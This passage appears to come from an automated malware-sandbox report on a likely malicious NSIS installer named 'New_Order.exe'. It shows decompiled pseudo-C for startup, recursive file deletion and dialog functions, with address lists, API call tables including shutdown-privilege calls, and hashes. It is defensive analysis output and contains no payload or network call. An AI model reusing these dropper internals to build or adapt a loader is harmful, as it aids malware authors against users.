						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                        0x00403358
                                                                        0x0040335c
                                                                        0x00403364
                                                                        0x00403368
                                                                        0x0040336d
                                                                        0x00403379
                                                                        0x00403382
                                                                        0x00403387
                                                                        0x0040338a
                                                                        0x00403391
                                                                        0x00403398
                                                                        0x00403398
                                                                        0x00403391
                                                                        0x0040339a
                                                                        0x0040339f
                                                                        0x004033a0
                                                                        0x004033ac
                                                                        0x004033b0
                                                                        0x004033b6
                                                                        0x004033c4
                                                                        0x004033c9
                                                                        0x004033d0
                                                                        0x004033d4
                                                                        0x004033d8
                                                                        0x004033da
                                                                        0x004033da
                                                                        0x004033d8
                                                                        0x004033e2
                                                                        0x004033e9
                                                                        0x004033ef
                                                                        0x00403405
                                                                        0x00403415
                                                                        0x0040341a
                                                                        0x00403420
                                                                        0x00403427
                                                                        0x00403433
                                                                        0x0040343d
                                                                        0x0040343f
                                                                        0x00403441
                                                                        0x00403446
                                                                        0x00403446
                                                                        0x00403456
                                                                        0x0040345c
                                                                        0x00403525
                                                                        0x00403525
                                                                        0x00403527
                                                                        0x00403529
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403465
                                                                        0x00403468
                                                                        0x00403470
                                                                        0x00403470
                                                                        0x00403473
                                                                        0x00403478
                                                                        0x0040347a
                                                                        0x0040347a
                                                                        0x0040347b
                                                                        0x0040347b
                                                                        0x00403480
                                                                        0x00403483
                                                                        0x00403515
                                                                        0x0040351a
                                                                        0x0040351f
                                                                        0x00403522
                                                                        0x00403524
                                                                        0x00403524
                                                                        0x00403524
                                                                        0x00000000
                                                                        0x00403489
                                                                        0x00403489
                                                                        0x0040348a
                                                                        0x0040348d
                                                                        0x004034a5
                                                                        0x004034d0
                                                                        0x004034d2
                                                                        0x004034e5
                                                                        0x00403510
                                                                        0x00403513
                                                                        0x00403531
                                                                        0x00403534
                                                                        0x0040353d
                                                                        0x00403542
                                                                        0x00403548
                                                                        0x00403553
                                                                        0x00403555
                                                                        0x0040355a
                                                                        0x0040355c
                                                                        0x004035b4
                                                                        0x004035b9
                                                                        0x004035c3
                                                                        0x004035ca
                                                                        0x004035ce
                                                                        0x00403662
                                                                        0x00403662
                                                                        0x00403667
                                                                        0x0040366d
                                                                        0x00403672
                                                                        0x00403796
                                                                        0x0040379c
                                                                        0x00403818
                                                                        0x00403818
                                                                        0x0040381d
                                                                        0x00403820
                                                                        0x00403822
                                                                        0x00403822
                                                                        0x0040382a
                                                                        0x0040382a
                                                                        0x004037ac
                                                                        0x004037b4
                                                                        0x004037b6
                                                                        0x004037b7
                                                                        0x004037c4
                                                                        0x004037d7
                                                                        0x004037df
                                                                        0x004037e3
                                                                        0x004037e3
                                                                        0x004037eb
                                                                        0x004037f0
                                                                        0x004037f7
                                                                        0x00403805
                                                                        0x00403807
                                                                        0x0040380d
                                                                        0x0040380f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004037f9
                                                                        0x004037ff
                                                                        0x00403801
                                                                        0x00403803
                                                                        0x00403811
                                                                        0x00403813
                                                                        0x00000000
                                                                        0x00403813
                                                                        0x00000000
                                                                        0x00403803
                                                                        0x004037f7
                                                                        0x00403681
                                                                        0x00403688
                                                                        0x00403688
                                                                        0x004035da
                                                                        0x00403652
                                                                        0x00403652
                                                                        0x0040365e
                                                                        0x00000000
                                                                        0x0040365e
                                                                        0x004035e3
                                                                        0x004035e7
                                                                        0x0040361d
                                                                        0x0040361d
                                                                        0x0040361f
                                                                        0x00403627
                                                                        0x00403699
                                                                        0x0040369b
                                                                        0x004036a2
                                                                        0x004036aa
                                                                        0x004036aa
                                                                        0x004036b5
                                                                        0x004036ba
                                                                        0x004036c9
                                                                        0x004036cd
                                                                        0x004036ce
                                                                        0x004036d7
                                                                        0x004036d0
                                                                        0x004036d0
                                                                        0x004036d0
                                                                        0x004036dd
                                                                        0x004036e3
                                                                        0x004036e9
                                                                        0x004036f1
                                                                        0x004036f1
                                                                        0x004036ff
                                                                        0x00403704
                                                                        0x00403716
                                                                        0x0040371e
                                                                        0x00403724
                                                                        0x00403730
                                                                        0x00403736
                                                                        0x00403740
                                                                        0x00403756
                                                                        0x00403767
                                                                        0x0040376d
                                                                        0x00403774
                                                                        0x00403777
                                                                        0x0040377d
                                                                        0x0040377d
                                                                        0x00403774
                                                                        0x00403781
                                                                        0x00403787
                                                                        0x00403787
                                                                        0x0040378c
                                                                        0x0040378c
                                                                        0x00000000
                                                                        0x004036c9
                                                                        0x00403629
                                                                        0x0040362b
                                                                        0x00403636
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040363e
                                                                        0x00403649
                                                                        0x0040364e
                                                                        0x00000000
                                                                        0x0040364e
                                                                        0x00403612
                                                                        0x00403614
                                                                        0x00403618
                                                                        0x0040361b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040361b
                                                                        0x00000000
                                                                        0x00403614
                                                                        0x00403564
                                                                        0x00403570
                                                                        0x00403575
                                                                        0x0040357a
                                                                        0x0040357c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403584
                                                                        0x0040358c
                                                                        0x0040359d
                                                                        0x004035a5
                                                                        0x004035a7
                                                                        0x004035ac
                                                                        0x004035ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035ae
                                                                        0x00000000
                                                                        0x00403513
                                                                        0x004034d4
                                                                        0x004034d7
                                                                        0x004034da
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x004034e0
                                                                        0x00000000
                                                                        0x004034e0
                                                                        0x004034dc
                                                                        0x004034de
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004034de
                                                                        0x0040348f
                                                                        0x00403492
                                                                        0x00403495
                                                                        0x0040349b
                                                                        0x0040349b
                                                                        0x00000000
                                                                        0x0040349b
                                                                        0x00403497
                                                                        0x00403499
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403499
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040346a
                                                                        0x0040346a
                                                                        0x0040346a
                                                                        0x0040346b
                                                                        0x0040346b
                                                                        0x00000000
                                                                        0x0040346a
                                                                        0x00000000

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 0040336D
                                                                        • GetVersion.KERNEL32 ref: 00403373
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                        • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                        • GetCommandLineA.KERNEL32(Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\New_Order.exe" ,00000020,"C:\Users\user\Desktop\New_Order.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                        • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403924
                                                                          • Part of subcall function 0040390A: lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                                                                          • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                          • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                                          • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                                          • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                                          • Part of subcall function 00403830: CloseHandle.KERNEL32(000002A0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                        • ExitProcess.KERNEL32 ref: 00403688
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                        • ExitWindowsEx.USER32 ref: 00403807
                                                                        • ExitProcess.KERNEL32 ref: 0040382A
                                                                          • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                                        • String ID: "$"C:\Users\user\Desktop\New_Order.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New_Order.exe$Error launching installer$Lat Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                        • API String ID: 1314998376-1048902453
                                                                        • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                        • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                        • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                        • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                        0x004058c9
                                                                        0x004058ce
                                                                        0x004058d7
                                                                        0x004058da
                                                                        0x004058e2
                                                                        0x004058e5
                                                                        0x004058e8
                                                                        0x004058f0
                                                                        0x004058f2
                                                                        0x004058f3
                                                                        0x00000000
                                                                        0x004058f3
                                                                        0x004058fe
                                                                        0x00405901
                                                                        0x00405901
                                                                        0x00405901
                                                                        0x00405905
                                                                        0x00405918
                                                                        0x0040591f
                                                                        0x00405924
                                                                        0x00405928
                                                                        0x00405938
                                                                        0x0040592a
                                                                        0x00405930
                                                                        0x00405930
                                                                        0x0040593d
                                                                        0x00405940
                                                                        0x0040594b
                                                                        0x00405951
                                                                        0x00405956
                                                                        0x00405966
                                                                        0x00405968
                                                                        0x0040596e
                                                                        0x00405971
                                                                        0x00405974
                                                                        0x00405a2c
                                                                        0x00405a2c
                                                                        0x00405a30
                                                                        0x00405a32
                                                                        0x00405a32
                                                                        0x00405a32
                                                                        0x00405a32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040597a
                                                                        0x0040597a
                                                                        0x00405983
                                                                        0x00405989
                                                                        0x0040598e
                                                                        0x00405991
                                                                        0x00405993
                                                                        0x00405997
                                                                        0x00405999
                                                                        0x00405999
                                                                        0x00405997
                                                                        0x0040599c
                                                                        0x0040599f
                                                                        0x004059b2
                                                                        0x004059b4
                                                                        0x004059b9
                                                                        0x004059c0
                                                                        0x004059db
                                                                        0x004059e0
                                                                        0x004059e2
                                                                        0x00405a06
                                                                        0x004059e4
                                                                        0x004059e4
                                                                        0x004059e7
                                                                        0x004059fb
                                                                        0x004059e9
                                                                        0x004059ec
                                                                        0x004059f4
                                                                        0x004059f4
                                                                        0x004059e7
                                                                        0x004059c2
                                                                        0x004059c8
                                                                        0x004059ca
                                                                        0x004059d0
                                                                        0x004059d0
                                                                        0x004059ca
                                                                        0x00000000
                                                                        0x004059c0
                                                                        0x004059a1
                                                                        0x004059a4
                                                                        0x004059a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004059a8
                                                                        0x004059aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004059ac
                                                                        0x004059b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a0b
                                                                        0x00405a15
                                                                        0x00405a1b
                                                                        0x00405a1b
                                                                        0x00405a26
                                                                        0x00000000
                                                                        0x00405a26
                                                                        0x00405942
                                                                        0x00405949
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405907
                                                                        0x00405907
                                                                        0x00405909
                                                                        0x00405a36
                                                                        0x00405a38
                                                                        0x00405a3b
                                                                        0x00405a8c
                                                                        0x00405a8c
                                                                        0x00405a8c
                                                                        0x00405a3d
                                                                        0x00405a40
                                                                        0x00405a4b
                                                                        0x00405a50
                                                                        0x00405a52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a55
                                                                        0x00405a61
                                                                        0x00405a66
                                                                        0x00405a68
                                                                        0x00000000
                                                                        0x00405a83
                                                                        0x00405a6a
                                                                        0x00405a6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405a72
                                                                        0x00000000
                                                                        0x00405a79
                                                                        0x00405a42
                                                                        0x00405a42
                                                                        0x00000000
                                                                        0x00405a42
                                                                        0x0040590f
                                                                        0x00405912
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405912

                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                        • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                        • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                        Strings
                                                                        • \*.*, xrefs: 0040592A
                                                                        • "C:\Users\user\Desktop\New_Order.exe" , xrefs: 004058BF
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-1601413275
                                                                        • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                        • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                        • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                        • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                                                                        0x00406476
                                                                        0x0040647f
                                                                        0x00000000
                                                                        0x0040648c
                                                                        0x00406482
                                                                        0x00000000

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                        • FindClose.KERNEL32(00000000), ref: 00406482
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
